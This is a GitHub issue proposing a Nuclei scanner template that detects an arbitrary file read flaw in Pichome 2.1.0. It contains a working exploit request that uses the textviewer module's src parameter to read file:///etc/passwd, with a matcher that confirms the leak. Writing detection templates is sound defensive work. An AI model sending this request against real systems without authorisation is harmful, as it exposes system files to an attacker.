### ISSUE TITLE
Pichome 2.1.0 Arbitrary File Read Vulnerability

### ISSUE THREAD

**Issue by test-bug-ux** [projectdiscovery/nuclei-templates#11863]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: pichome-file-read

info:
  name: Pichome 2.1.0 Arbitrary File Read Vulnerability
  author: 3th1c_yuk1
  severity: high
  description: zyx0814 Pichome 2.1.0 has an arbitrary file read vulnerability.
  reference:
    - https://github.com/sheratan4/cve/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,pichome

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?mod=textviewer&src=file:///etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```

### Relevant dumped responses

```shell

```
